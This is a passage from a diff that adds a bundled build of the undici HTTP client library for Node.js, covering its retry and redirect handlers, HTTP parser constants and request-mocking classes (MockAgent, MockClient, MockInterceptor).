Math.min(retryAfterHeader, maxTimeout) + : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) + + state.currentTimeout = retryTimeout + + setTimeout(() => cb(null), retryTimeout) + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const headers = parseHeaders(rawHeaders) + + this.retryCount += 1 + + if (statusCode >= 300) { + this.abort( + new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Checkpoint for resume from where we left it + if (this.resume != null) { + this.resume = null + + if (statusCode !== 206) { + return true + } + + const contentRange = parseRangeHeader(headers['content-range']) + // If no content range + if (!contentRange) { + this.abort( + new RequestRetryError('Content-Range mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Let's start with a weak etag check + if (this.etag != null && this.etag !== headers.etag) { + this.abort( + new RequestRetryError('ETag mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + const { start, size, end = size } = contentRange + + assert(this.start === start, 'content-range mismatch') + assert(this.end == null || this.end === end, 'content-range mismatch') + + this.resume = resume + return true + } + + if (this.end == null) { + if (statusCode === 206) { + // First time we receive 206 + const range = parseRangeHeader(headers['content-range']) + + if (range == null) { + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const { start, size, end = size } = range + + assert( + start != null && Number.isFinite(start) && this.start !== start, + 'content-range mismatch' + ) + assert(Number.isFinite(start)) + assert( + end != null && Number.isFinite(end) && this.end !== end, + 'invalid content-length' + ) + + this.start = start + this.end = end + } + + // We make our best to checkpoint the 
body for further range headers + if (this.end == null) { + const contentLength = headers['content-length'] + this.end = contentLength != null ? Number(contentLength) : null + } + + assert(Number.isFinite(this.start)) + assert( + this.end == null || Number.isFinite(this.end), + 'invalid content-length' + ) + + this.resume = resume + this.etag = headers.etag != null ? headers.etag : null + + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const err = new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + + this.abort(err) + + return false + } + + onData (chunk) { + this.start += chunk.length + + return this.handler.onData(chunk) + } + + onComplete (rawTrailers) { + this.retryCount = 0 + return this.handler.onComplete(rawTrailers) + } + + onError (err) { + if (this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + this.retryOpts.retry( + err, + { + state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, + opts: { retryOptions: this.retryOpts, ...this.opts } + }, + onRetry.bind(this) + ) + + function onRetry (err) { + if (err != null || this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + if (this.start !== 0) { + this.opts = { + ...this.opts, + headers: { + ...this.opts.headers, + range: `bytes=${this.start}-${this.end ?? 
''}` + } + } + } + + try { + this.dispatch(this.opts, this) + } catch (err) { + this.handler.onError(err) + } + } + } +} + +module.exports = RetryHandler + + +/***/ }), + +/***/ 8861: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const RedirectHandler = __nccwpck_require__(2860) + +function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { + return (dispatch) => { + return function Intercept (opts, handler) { + const { maxRedirections = defaultMaxRedirections } = opts + + if (!maxRedirections) { + return dispatch(opts, handler) + } + + const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) + opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. + return dispatch(opts, redirectHandler) + } + } +} + +module.exports = createRedirectInterceptor + + +/***/ }), + +/***/ 953: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; +const utils_1 = __nccwpck_require__(1891); +// C headers +var ERROR; +(function (ERROR) { + ERROR[ERROR["OK"] = 0] = "OK"; + ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; + ERROR[ERROR["STRICT"] = 2] = "STRICT"; + ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; + ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; + 
ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; + ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; + ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; + ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; + ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; + ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; + ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; + ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; + ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; + ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; + ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; + ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; + ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; + ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; + ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; + ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; + ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; + ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; + ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; + ERROR[ERROR["USER"] = 24] = "USER"; +})(ERROR = exports.ERROR || (exports.ERROR = {})); +var TYPE; +(function (TYPE) { + TYPE[TYPE["BOTH"] = 0] = "BOTH"; + TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; + TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; +})(TYPE = exports.TYPE || (exports.TYPE = {})); +var FLAGS; +(function (FLAGS) { + FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; + FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; + FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; + FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; + FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; + FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; + FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; + FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; + // 1 << 8 is unused + 
FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; +})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); +var LENIENT_FLAGS; +(function (LENIENT_FLAGS) { + LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; + LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; + LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; +})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); +var METHODS; +(function (METHODS) { + METHODS[METHODS["DELETE"] = 0] = "DELETE"; + METHODS[METHODS["GET"] = 1] = "GET"; + METHODS[METHODS["HEAD"] = 2] = "HEAD"; + METHODS[METHODS["POST"] = 3] = "POST"; + METHODS[METHODS["PUT"] = 4] = "PUT"; + /* pathological */ + METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; + METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; + METHODS[METHODS["TRACE"] = 7] = "TRACE"; + /* WebDAV */ + METHODS[METHODS["COPY"] = 8] = "COPY"; + METHODS[METHODS["LOCK"] = 9] = "LOCK"; + METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; + METHODS[METHODS["MOVE"] = 11] = "MOVE"; + METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; + METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; + METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; + METHODS[METHODS["UNLOCK"] = 15] = "UNLOCK"; + METHODS[METHODS["BIND"] = 16] = "BIND"; + METHODS[METHODS["REBIND"] = 17] = "REBIND"; + METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; + METHODS[METHODS["ACL"] = 19] = "ACL"; + /* subversion */ + METHODS[METHODS["REPORT"] = 20] = "REPORT"; + METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; + METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; + METHODS[METHODS["MERGE"] = 23] = "MERGE"; + /* upnp */ + METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; + METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; + METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; + METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; + /* RFC-5789 */ + METHODS[METHODS["PATCH"] = 28] = "PATCH"; + METHODS[METHODS["PURGE"] = 29] = "PURGE"; + /* CalDAV */ + METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; + /* 
RFC-2068, section 19.6.1.2 */ + METHODS[METHODS["LINK"] = 31] = "LINK"; + METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; + /* icecast */ + METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; + /* RFC-7540, section 11.6 */ + METHODS[METHODS["PRI"] = 34] = "PRI"; + /* RFC-2326 RTSP */ + METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; + METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; + METHODS[METHODS["SETUP"] = 37] = "SETUP"; + METHODS[METHODS["PLAY"] = 38] = "PLAY"; + METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; + METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; + METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; + METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; + METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; + METHODS[METHODS["RECORD"] = 44] = "RECORD"; + /* RAOP */ + METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; +})(METHODS = exports.METHODS || (exports.METHODS = {})); +exports.METHODS_HTTP = [ + METHODS.DELETE, + METHODS.GET, + METHODS.HEAD, + METHODS.POST, + METHODS.PUT, + METHODS.CONNECT, + METHODS.OPTIONS, + METHODS.TRACE, + METHODS.COPY, + METHODS.LOCK, + METHODS.MKCOL, + METHODS.MOVE, + METHODS.PROPFIND, + METHODS.PROPPATCH, + METHODS.SEARCH, + METHODS.UNLOCK, + METHODS.BIND, + METHODS.REBIND, + METHODS.UNBIND, + METHODS.ACL, + METHODS.REPORT, + METHODS.MKACTIVITY, + METHODS.CHECKOUT, + METHODS.MERGE, + METHODS['M-SEARCH'], + METHODS.NOTIFY, + METHODS.SUBSCRIBE, + METHODS.UNSUBSCRIBE, + METHODS.PATCH, + METHODS.PURGE, + METHODS.MKCALENDAR, + METHODS.LINK, + METHODS.UNLINK, + METHODS.PRI, + // TODO(indutny): should we allow it with HTTP? 
+ METHODS.SOURCE, +]; +exports.METHODS_ICE = [ + METHODS.SOURCE, +]; +exports.METHODS_RTSP = [ + METHODS.OPTIONS, + METHODS.DESCRIBE, + METHODS.ANNOUNCE, + METHODS.SETUP, + METHODS.PLAY, + METHODS.PAUSE, + METHODS.TEARDOWN, + METHODS.GET_PARAMETER, + METHODS.SET_PARAMETER, + METHODS.REDIRECT, + METHODS.RECORD, + METHODS.FLUSH, + // For AirPlay + METHODS.GET, + METHODS.POST, +]; +exports.METHOD_MAP = utils_1.enumToMap(METHODS); +exports.H_METHOD_MAP = {}; +Object.keys(exports.METHOD_MAP).forEach((key) => { + if (/^H/.test(key)) { + exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; + } +}); +var FINISH; +(function (FINISH) { + FINISH[FINISH["SAFE"] = 0] = "SAFE"; + FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; + FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; +})(FINISH = exports.FINISH || (exports.FINISH = {})); +exports.ALPHA = []; +for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { + // Upper case + exports.ALPHA.push(String.fromCharCode(i)); + // Lower case + exports.ALPHA.push(String.fromCharCode(i + 0x20)); +} +exports.NUM_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, +}; +exports.HEX_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, + A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, + a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, +}; +exports.NUM = [ + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', +]; +exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); +exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; +exports.USERINFO_CHARS = exports.ALPHANUM + .concat(exports.MARK) + .concat(['%', ';', ':', '&', '=', '+', '$', ',']); +// TODO(indutny): use RFC +exports.STRICT_URL_CHAR = [ + '!', '"', '$', '%', '&', '\'', + '(', ')', '*', '+', ',', '-', '.', '/', + ':', ';', '<', '=', '>', + '@', '[', '\\', ']', '^', '_', + '`', + '{', '|', '}', '~', +].concat(exports.ALPHANUM); +exports.URL_CHAR = exports.STRICT_URL_CHAR + .concat(['\t', '\f']); +// All characters with 0x80 bit set to 1 +for 
(let i = 0x80; i <= 0xff; i++) { + exports.URL_CHAR.push(i); +} +exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); +/* Tokens as defined by rfc 2616. Also lowercases them. + * token = 1* + * separators = "(" | ")" | "<" | ">" | "@" + * | "," | ";" | ":" | "\" | <"> + * | "/" | "[" | "]" | "?" | "=" + * | "{" | "}" | SP | HT + */ +exports.STRICT_TOKEN = [ + '!', '#', '$', '%', '&', '\'', + '*', '+', '-', '.', + '^', '_', '`', + '|', '~', +].concat(exports.ALPHANUM); +exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); +/* + * Verify that a char is a valid visible (printable) US-ASCII + * character or %x80-FF + */ +exports.HEADER_CHARS = ['\t']; +for (let i = 32; i <= 255; i++) { + if (i !== 127) { + exports.HEADER_CHARS.push(i); + } +} +// ',' = \x44 +exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); +exports.MAJOR = exports.NUM_MAP; +exports.MINOR = exports.MAJOR; +var HEADER_STATE; +(function (HEADER_STATE) { + HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; + HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; + HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; + HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; + HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; + HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; + HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; +})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); +exports.SPECIAL_HEADERS = { + 'connection': HEADER_STATE.CONNECTION, + 'content-length': HEADER_STATE.CONTENT_LENGTH, + 'proxy-connection': HEADER_STATE.CONNECTION, + 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, + 'upgrade': HEADER_STATE.UPGRADE, +}; +//# 
sourceMappingURL=constants.js.map + +/***/ }), + +/***/ 1145: +/***/ ((module) => { + +module.exports = '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' + + +/***/ }), + +/***/ 5627: +/***/ ((module) => { + +module.exports = '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' + + +/***/ }), + +/***/ 1891: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.enumToMap = void 0; +function enumToMap(obj) { + const res = {}; + Object.keys(obj).forEach((key) => { + const value = obj[key]; + if (typeof value === 'number') { + res[key] = value; + } + }); + return res; +} +exports.enumToMap = enumToMap; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 6771: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kClients } = __nccwpck_require__(2785) +const Agent = __nccwpck_require__(7890) +const { + kAgent, + kMockAgentSet, + kMockAgentGet, + kDispatches, + kIsMockActive, + kNetConnect, + kGetNetConnect, + kOptions, + kFactory +} = __nccwpck_require__(4347) +const MockClient = __nccwpck_require__(8687) +const MockPool = __nccwpck_require__(6193) +const { matchValue, buildMockOptions } = __nccwpck_require__(9323) +const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) +const Dispatcher = __nccwpck_require__(412) +const Pluralizer = __nccwpck_require__(8891) +const PendingInterceptorsFormatter = __nccwpck_require__(6823) + +class FakeWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value + } +} + +class MockAgent extends Dispatcher { + constructor (opts) { + super(opts) + + this[kNetConnect] = true + this[kIsMockActive] = true + + // Instantiate Agent and encapsulate + if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + const agent = opts && opts.agent ? 
opts.agent : new Agent(opts) + this[kAgent] = agent + + this[kClients] = agent[kClients] + this[kOptions] = buildMockOptions(opts) + } + + get (origin) { + let dispatcher = this[kMockAgentGet](origin) + + if (!dispatcher) { + dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + } + return dispatcher + } + + dispatch (opts, handler) { + // Call MockAgent.get to perform additional setup before dispatching as normal + this.get(opts.origin) + return this[kAgent].dispatch(opts, handler) + } + + async close () { + await this[kAgent].close() + this[kClients].clear() + } + + deactivate () { + this[kIsMockActive] = false + } + + activate () { + this[kIsMockActive] = true + } + + enableNetConnect (matcher) { + if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { + if (Array.isArray(this[kNetConnect])) { + this[kNetConnect].push(matcher) + } else { + this[kNetConnect] = [matcher] + } + } else if (typeof matcher === 'undefined') { + this[kNetConnect] = true + } else { + throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') + } + } + + disableNetConnect () { + this[kNetConnect] = false + } + + // This is required to bypass issues caused by using global symbols - see: + // https://github.com/nodejs/undici/issues/1447 + get isMockActive () { + return this[kIsMockActive] + } + + [kMockAgentSet] (origin, dispatcher) { + this[kClients].set(origin, new FakeWeakRef(dispatcher)) + } + + [kFactory] (origin) { + const mockOptions = Object.assign({ agent: this }, this[kOptions]) + return this[kOptions] && this[kOptions].connections === 1 + ? 
new MockClient(origin, mockOptions) + : new MockPool(origin, mockOptions) + } + + [kMockAgentGet] (origin) { + // First check if we can immediately find it + const ref = this[kClients].get(origin) + if (ref) { + return ref.deref() + } + + // If the origin is not a string create a dummy parent pool and return to user + if (typeof origin !== 'string') { + const dispatcher = this[kFactory]('http://localhost:9999') + this[kMockAgentSet](origin, dispatcher) + return dispatcher + } + + // If we match, create a pool and assign the same dispatches + for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { + const nonExplicitDispatcher = nonExplicitRef.deref() + if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { + const dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] + return dispatcher + } + } + } + + [kGetNetConnect] () { + return this[kNetConnect] + } + + pendingInterceptors () { + const mockAgentClients = this[kClients] + + return Array.from(mockAgentClients.entries()) + .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) + .filter(({ pending }) => pending) + } + + assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { + const pending = this.pendingInterceptors() + + if (pending.length === 0) { + return + } + + const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) + + throw new UndiciError(` +${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: + +${pendingInterceptorsFormatter.format(pending)} +`.trim()) + } +} + +module.exports = MockAgent + + +/***/ }), + +/***/ 8687: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Client = __nccwpck_require__(3598) +const { 
buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockClient provides an API that extends the Client to influence the mockDispatches. + */ +class MockClient extends Client { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. 
+ */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockClient + + +/***/ }), + +/***/ 888: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { UndiciError } = __nccwpck_require__(8045) + +class MockNotMatchedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, MockNotMatchedError) + this.name = 'MockNotMatchedError' + this.message = message || 'The request does not match any registered mock dispatches' + this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' + } +} + +module.exports = { + MockNotMatchedError +} + + +/***/ }), + +/***/ 410: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kDispatchKey, + kDefaultHeaders, + kDefaultTrailers, + kContentLength, + kMockDispatch +} = __nccwpck_require__(4347) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { buildURL } = __nccwpck_require__(3983) + +/** + * Defines the scope API for an interceptor reply + */ +class MockScope { + constructor (mockDispatch) { + this[kMockDispatch] = mockDispatch + } + + /** + * Delay a reply by a set amount in ms. + */ + delay (waitInMs) { + if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { + throw new InvalidArgumentError('waitInMs must be a valid integer > 0') + } + + this[kMockDispatch].delay = waitInMs + return this + } + + /** + * For a defined reply, never mark as consumed. + */ + persist () { + this[kMockDispatch].persist = true + return this + } + + /** + * Allow one to define a reply for a set amount of matching requests. 
+ */ + times (repeatTimes) { + if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { + throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') + } + + this[kMockDispatch].times = repeatTimes + return this + } +} + +/** + * Defines an interceptor for a Mock + */ +class MockInterceptor { + constructor (opts, mockDispatches) { + if (typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object') + } + if (typeof opts.path === 'undefined') { + throw new InvalidArgumentError('opts.path must be defined') + } + if (typeof opts.method === 'undefined') { + opts.method = 'GET' + } + // See https://github.com/nodejs/undici/issues/1245 + // As per RFC 3986, clients are not supposed to send URI + // fragments to servers when they retrieve a document, + if (typeof opts.path === 'string') { + if (opts.query) { + opts.path = buildURL(opts.path, opts.query) + } else { + // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 + const parsedURL = new URL(opts.path, 'data://') + opts.path = parsedURL.pathname + parsedURL.search + } + } + if (typeof opts.method === 'string') { + opts.method = opts.method.toUpperCase() + } + + this[kDispatchKey] = buildKey(opts) + this[kDispatches] = mockDispatches + this[kDefaultHeaders] = {} + this[kDefaultTrailers] = {} + this[kContentLength] = false + } + + createMockScopeDispatchData (statusCode, data, responseOptions = {}) { + const responseData = getResponseData(data) + const contentLength = this[kContentLength] ? 
{ 'content-length': responseData.length } : {} + const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } + const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } + + return { statusCode, data, headers, trailers } + } + + validateReplyParameters (statusCode, data, responseOptions) { + if (typeof statusCode === 'undefined') { + throw new InvalidArgumentError('statusCode must be defined') + } + if (typeof data === 'undefined') { + throw new InvalidArgumentError('data must be defined') + } + if (typeof responseOptions !== 'object') { + throw new InvalidArgumentError('responseOptions must be an object') + } + } + + /** + * Mock an undici request with a defined reply. + */ + reply (replyData) { + // Values of reply aren't available right now as they + // can only be available when the reply callback is invoked. + if (typeof replyData === 'function') { + // We'll first wrap the provided callback in another function, + // this function will properly resolve the data from the callback + // when invoked. + const wrappedDefaultsCallback = (opts) => { + // Our reply options callback contains the parameter for statusCode, data and options. + const resolvedData = replyData(opts) + + // Check if it is in the right format + if (typeof resolvedData !== 'object') { + throw new InvalidArgumentError('reply options callback must return an object') + } + + const { statusCode, data = '', responseOptions = {} } = resolvedData + this.validateReplyParameters(statusCode, data, responseOptions) + // Since the values can be obtained immediately we return them + // from this higher order function that will be resolved later. + return { + ...this.createMockScopeDispatchData(statusCode, data, responseOptions) + } + } + + // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. 
+ const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) + return new MockScope(newMockDispatch) + } + + // We can have either one or three parameters, if we get here, + // we should have 1-3 parameters. So we spread the arguments of + // this function to obtain the parameters, since replyData will always + // just be the statusCode. + const [statusCode, data = '', responseOptions = {}] = [...arguments] + this.validateReplyParameters(statusCode, data, responseOptions) + + // Send in-already provided data like usual + const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) + return new MockScope(newMockDispatch) + } + + /** + * Mock an undici request with a defined error. + */ + replyWithError (error) { + if (typeof error === 'undefined') { + throw new InvalidArgumentError('error must be defined') + } + + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) + return new MockScope(newMockDispatch) + } + + /** + * Set default reply headers on the interceptor for subsequent replies + */ + defaultReplyHeaders (headers) { + if (typeof headers === 'undefined') { + throw new InvalidArgumentError('headers must be defined') + } + + this[kDefaultHeaders] = headers + return this + } + + /** + * Set default reply trailers on the interceptor for subsequent replies + */ + defaultReplyTrailers (trailers) { + if (typeof trailers === 'undefined') { + throw new InvalidArgumentError('trailers must be defined') + } + + this[kDefaultTrailers] = trailers + return this + } + + /** + * Set reply content length header for replies on the interceptor + */ + replyContentLength () { + this[kContentLength] = true + return this + } +} + +module.exports.MockInterceptor = MockInterceptor +module.exports.MockScope = MockScope + + +/***/ }), + +/***/ 6193: +/***/ ((module, 
